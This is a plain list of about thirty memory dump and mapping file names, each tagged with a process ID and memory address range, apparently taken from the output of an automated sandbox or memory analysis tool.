memory/1512-444-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/2856-446-0x00000000056A0000-0x0000000005CB8000-memory.dmp
memory/1512-440-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4128-448-0x0000000000000000-mapping.dmp
memory/2392-454-0x0000000000000000-mapping.dmp
memory/5704-458-0x0000000005010000-0x0000000005011000-memory.dmp
memory/5376-461-0x0000000000000000-mapping.dmp
memory/5464-462-0x0000000000000000-mapping.dmp
memory/5488-467-0x0000000004A80000-0x0000000004A81000-memory.dmp
memory/5376-476-0x0000000005080000-0x0000000005081000-memory.dmp
memory/5880-478-0x0000000000000000-mapping.dmp
memory/672-480-0x000000001B4E4000-0x000000001B4E5000-memory.dmp
memory/5940-481-0x0000000000000000-mapping.dmp
memory/6052-483-0x0000000000000000-mapping.dmp
memory/4556-482-0x0000000000000000-mapping.dmp
memory/4884-487-0x0000000000000000-mapping.dmp
memory/4000-485-0x0000000000000000-mapping.dmp
memory/5940-486-0x0000000002D50000-0x0000000002D51000-memory.dmp
memory/4924-489-0x0000000000000000-mapping.dmp
memory/3308-490-0x0000000000000000-mapping.dmp
memory/1720-492-0x0000000000000000-mapping.dmp
memory/2284-498-0x0000000000000000-mapping.dmp
memory/3308-503-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5372-502-0x0000000000000000-mapping.dmp
memory/2284-507-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5264-505-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5256-501-0x0000000000000000-mapping.dmp
memory/5264-497-0x0000000000000000-mapping.dmp
memory/4924-499-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4000-496-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5372-513-0x0000000000700000-0x0000000000701000-memory.dmp